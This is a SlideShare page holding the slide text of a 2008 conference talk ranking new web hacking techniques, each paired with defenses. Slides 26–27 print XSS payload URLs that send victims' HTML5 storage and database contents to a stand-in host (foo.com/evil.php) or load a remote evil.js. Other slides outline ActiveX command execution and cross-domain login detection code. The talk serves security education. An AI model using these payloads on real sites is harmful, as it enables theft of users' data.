Top 10 Web Hacks 2012Matt Johansen
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - IntroductionSQALab
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Cenzic
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5Krishna T
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101Sasha Nunke
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
Hacking The World With Flash
Hacking The World With FlashHacking The World With Flash
Hacking The World With Flashjoepangus
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Shreeraj Shah
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Securitychuckbt
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 

Similar to Top Ten Web Hacking Techniques (2008) (20)

MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
 
Website security systems
Website security systemsWebsite security systems
Website security systems
 
4.Xss
4.Xss4.Xss
4.Xss
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Hacking The World With Flash
Hacking The World With FlashHacking The World With Flash
Hacking The World With Flash
 
TS-5358
TS-5358TS-5358
TS-5358
 
TS-5358
TS-5358TS-5358
TS-5358
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
 

More from Jeremiah Grossman

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterJeremiah Grossman
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorJeremiah Grossman
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryJeremiah Grossman
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideJeremiah Grossman
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Jeremiah Grossman
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowJeremiah Grossman
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Jeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Jeremiah Grossman
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015Jeremiah Grossman
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesJeremiah Grossman
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedJeremiah Grossman
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportJeremiah Grossman
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)Jeremiah Grossman
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]Jeremiah Grossman
 

More from Jeremiah Grossman (20)

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matter
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare Industry
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers Guide
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to Know
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security Guarantees
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report Explained
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]
 

Recently uploaded

Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 

Recently uploaded (20)

Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 

Top Ten Web Hacking Techniques (2008)

  • 1. Top Ten Web Hacking Techniques 2008 Jeremiah Grossman Founder & Chief Technology Officer
  • 2. Top Ten Web Hacking Techniques (2008) Jeremiah Grossman • WhiteHat Security Founder & CTO • Technology R&D and industry evangelist (InfoWorld's CTO Top 25 for 2007) • Frequent international conference speaker • Co-founder of the Web Application Security Consortium • Co-author: Cross-Site Scripting Attacks • Former Yahoo! information security officer © 2009 WhiteHat, Inc. | Page 2
  • 3. Top Ten Web Hacking Techniques (2008) WhiteHat Security • 200+ enterprise customers • Start-ups to Fortune 500 • Flagship offering “WhiteHat Sentinel Service” • 1000’s of assessments performed annually • Recognized leader in website security • Quoted hundreds of times by the mainstream press © 2009 WhiteHat, Inc. | Page 3
  • 4. Top Ten Web Hacking Techniques (2008) MUST be able to protect against MUST be able to protect against HOSTILE WEB USER HOSTILE WEB PAGE © 2009 WhiteHat, Inc. | Page 4
  • 5. Top Ten Web Hacking Techniques (2008) 2008’s New Web Hacking Techniques 65 (2006) 83 (2007) http://jeremiahgrossman.blogspot.com/2009/02/top-ten-web-hacking-techniques- of-2008.html 70 (2008) © 2009 WhiteHat, Inc. | Page 5
  • 6. Top Ten Web Hacking Techniques (2008) CUPS Detection Firefox cross-domain information theft (simple text strings, some CSV) CSRFing the uTorrent plugin Firefox 2 and WebKit nightly cross-domain image theft Clickjacking / Videojacking Browser's Ghost Busters Bypassing URL AuthC and AuthZ with HTTP Verb Tampering Exploiting XSS vulnerabilities on cookies I used to know what you watched, on YouTube Breaking Google Gears' Cross-Origin Communication Model Safari Carpet Bomb Flash Parameter Injection Flash clipboard Hijack Cross Environment Hopping Flash Internet Explorer security model bug Exploiting Logged Out XSS Vulnerabilities Frame Injection Fun Exploiting CSRF Protected XSS Free MacWorld Platinum Pass? Yes in 2008! ActiveX Repurposing Diminutive Worm, 161 byte Web Worm Tunneling tcp over http over sql-injection SNMP XSS Attack Arbitrary TCP over uploaded pages Res Timing File Enumeration Without JavaScript in IE7.0 Local DoS on CUPS to a remote exploit via specially-crafted webpage Stealing Basic Auth with Persistent XSS JavaScript Code Flow Manipulation Smuggling SMTP through open HTTP proxies Common localhost dns misconfiguration can lead to quot;same sitequot; scripting Collecting Lots of Free 'Micro-Deposits' Pulling system32 out over blind SQL Injection Using your browser URL history to estimate gender Dialog Spoofing - Firefox Basic Authentication Cross-site File Upload Attacks Skype cross-zone scripting vulnerability Same Origin Bypassing Using Image Dimensions Safari pwns Internet Explorer HTTP Proxies Bypass Firewalls IE quot;Print Table of Linksquot; Cross-Zone Scripting Vulnerability Join a Religion Via CSRF A different Opera Cross-domain leaks of site logins via Authenticated CSS Abusing HTML 5 Structured Client-side Storage JavaScript Global Namespace Pollution SSID Script Injection GIFAR DHCP Script Injection HTML/CSS Injections - Primitive Malicious Code File Download Injection Hacking Intranets Through Web Interfaces Navigation Hijacking (Frame/Tab Injection Attacks) Cookie Path Traversal UPnP Hacking via Flash Racing to downgrade users to cookie-less authentication Total surveillance made easy with VoIP phone MySQL and SQL Column Truncation Vulnerabilities Social Networks Evil Twin Attacks Building Subversive File Sharing With Client Side Applications Recursive File Include DoS Firefox XML injection into parse of remote XML Multi-pass filters bypass Session Extending Code Execution via XSS Redirector’s hell Persistent SQL Injection JSON Hijacking with UTF-7 SQL Smuggling Abusing PHP Sockets CSRF on Novell GroupWise WebAccess © 2009 WhiteHat, Inc. | Page 6
  • 7. Top Ten Web Hacking Techniques (2008) Flash Parameter Injection Flash Parameter Injection introduces a new way to inject values to global parameters in Flash movies while the movie is embedded in it's original HTML environment. These injected parameters can grant the attacker full control over the page DOM, as well as control over other objects within the Flash movie. This can lead to more elaborate 10 attacks that take advantage of the interaction between the Flash movie and the HTML page in which it is embedded. By: Yuval Baror, Ayal Yogev, and Adi Sharabani http://blog.watchfire.com/wfblog/2008/10/flash-parameter.html http://blog.watchfire.com/FPI.pdf © 2009 WhiteHat, Inc. | Page 7
  • 8. Top Ten Web Hacking Techniques (2008) How it works There are several different FPI variants. Most of the variants include tricking the server into sending back a page where user input is interpreted as Flash parameters. This allows an attacker to inject malicious global parameters to the Flash movie and exploit Flash specific vulnerabilities. ActionScript 2 code reading a global variable © 2009 WhiteHat, Inc. | Page 8
  • 9. Top Ten Web Hacking Techniques (2008) Passing arguments in an embedded URI Passing arguments using 'flashvars' DOM-based Flash parameter injection © 2009 WhiteHat, Inc. | Page 9
  • 10. Top Ten Web Hacking Techniques (2008) Persistent Flash Parameter Injection © 2009 WhiteHat, Inc. | Page 10
  • 11. Top Ten Web Hacking Techniques (2008) Defenses User input must be sanitized according to context before reflected back to the user. Extreme caution should be taken when saving user input in Flash cookies. © 2009 WhiteHat, Inc. | Page 11
  • 12. Top Ten Web Hacking Techniques (2008) ActiveX Repurposing Multi-staged attack to get code execution on victims who were running 9 a vulnerable and popular SSL-VPN ActiveX control. By: Haroon Meer http://carnal0wnage.blogspot.com/2008/08/owning-client-without-and-exploit.html http://www.sensepost.com/blog/2237.html http://www.networkworld.com/news/2008/080708-black-hat-ssl-vpn-security.html © 2009 WhiteHat, Inc. | Page 12
  • 13. Top Ten Web Hacking Techniques (2008) How it works © 2009 WhiteHat, Inc. | Page 13
  • 14. Top Ten Web Hacking Techniques (2008) 1. Client with control visits malicious page 2. Page instantiates control and offers an upgrade 3. new-config.txt downloads to c:predictable_locationnew-config.txt 4. Malicious page re-instantiates control with ini file == c:predictable_locationnew- config.txt [new-config contains arbitrary commands as uninstall string] 5. Exectute the controls uninstall method: 6.The victims machine fires calc.exe &&. © 2009 WhiteHat, Inc. | Page 14
  • 15. Top Ten Web Hacking Techniques (2008) Defenses Website: ActiveX should make use of Sitelock wherever possible. Web Browser: Restrict ActiveX to the maximum degree possible. © 2009 WhiteHat, Inc. | Page 15
  • 16. Top Ten Web Hacking Techniques (2008) Tunneling TCP over HTTP over SQL-Injection Create a TCP circuit through reDuh over squeeza by building the 8 server component within SQL Servers CLR subsystem. By: Glenn Willinson, Marco Slaviero and Haroon Meer http://www.sensepost.com/research/reDuh/SensePost_2008.tgz © 2009 WhiteHat, Inc. | Page 16
  • 17. Top Ten Web Hacking Techniques (2008) © 2009 WhiteHat, Inc. | Page 17
  • 18. Top Ten Web Hacking Techniques (2008) © 2009 WhiteHat, Inc. | Page 18
  • 19. Top Ten Web Hacking Techniques (2008) Defenses Good network architecture, solid application design, database hardening. © 2009 WhiteHat, Inc. | Page 19
  • 20. Top Ten Web Hacking Techniques (2008) Cross-domain leaks of site logins via Authenticated CSS Checks the contents of a stylesheet property value across domains. 7 The most reliable technique to determine whether the victim is logged- in to a given website or not. By: Chris Evans and Michal Zalewski http://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html © 2009 WhiteHat, Inc. | Page 20
  • 21. Top Ten Web Hacking Techniques (2008) How it works Perform a cross-domain load of a stylesheet and then reading property values using standard Javascript APIs. What makes it work on so many sites is that browsers will load inline style definitions from HTML documents. In addition, stylesheet properties differ wildly depending on whether a user is logged in or not. <html><head> <link rel=quot;stylesheetquot; href=quot;http://home.myspace.com/index.cfm?fuseaction=userquot;/> <script> function func() { var ele = document.getElementById('blah'); alert(window.getComputedStyle(ele, null).getPropertyValue('margin-bottom')); } </script></head> <body onload=quot;func()quot;> <div id=quot;blahquot; class=quot;showquot;> </body> </html> © 2009 WhiteHat, Inc. | Page 21
  • 22. Top Ten Web Hacking Techniques (2008) Defenses As a Web application, do not store anything sensitive (such as user- identifying customizations) in stylesheet properties. If you must, make sure to store the properties in their own CSS file and ensure the URL of that file unguessable to attackers for a given victim user. © 2009 WhiteHat, Inc. | Page 22
  • 23. Top Ten Web Hacking Techniques (2008) Abusing HTML 5 Structured Client-side Storage HTML5 has introduced three new powerful ways to save big amount of data on the client's PC through the browser. Attackers could steal or modify sensitive data online or offline. If a web application which uses this kind of client-side storage is vulnerable to XSS (Cross- site scripting) attacks we can use an 6 attack payload to read or modify the content of known storage keys (session storage, global storage, local storage or database storage) on the computer’s victim. If the web application loads data or code from the local storage, could be also quite powerful to inject malicious code that will be executed every time the web application will request it. By: Alberto Trivero http://trivero.secdiscover.com/html5whitepaper.pdf © 2009 WhiteHat, Inc. | Page 23
  • 24. Top Ten Web Hacking Techniques (2008) How it works Storage Object Enumeration var ss = quot;quot;; for(i in window.sessionStorage) { ss += i + quot; quot;; } var ls = quot;quot;; for(i = 0; i < localStorage.length; i++) { ls += localStorage.key(i) + quot; quot;; } Database Object Enumeration var db = quot;quot;; for(i in window) { if(window[i] == “[object Database]”) { db += i + “ “; } } © 2009 WhiteHat, Inc. | Page 24
  • 25. Top Ten Web Hacking Techniques (2008) Extracting Database Metadata SELECT name FROM sqlite_master WHERE type='table' SELECT sql FROM sqlite_master WHERE name='table_name' SELECT sqlite_version() © 2009 WhiteHat, Inc. | Page 25
  • 26. Top Ten Web Hacking Techniques (2008) One Shot Attack http://example.com/page.php?name=<script>document.write('<img src=quot;http://foo.com/ evil.php?name=' %2B globalStorage[location.hostname].mykey %2B 'quot;>');</script> http://example.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql (quot;SELECT * FROM client_tbquot;, [], function(tx, result){ document.write('<img src=quot;http:// foo.com/evil.php?name=' %2B result.rows.item(0)['col_data'] %2B 'quot;>'); }); });</script> © 2009 WhiteHat, Inc. | Page 26
  • 27. Top Ten Web Hacking Techniques (2008) http://example.com/page.php?name=<script src=http://foo.com/evil.js></ script> © 2009 WhiteHat, Inc. | Page 27
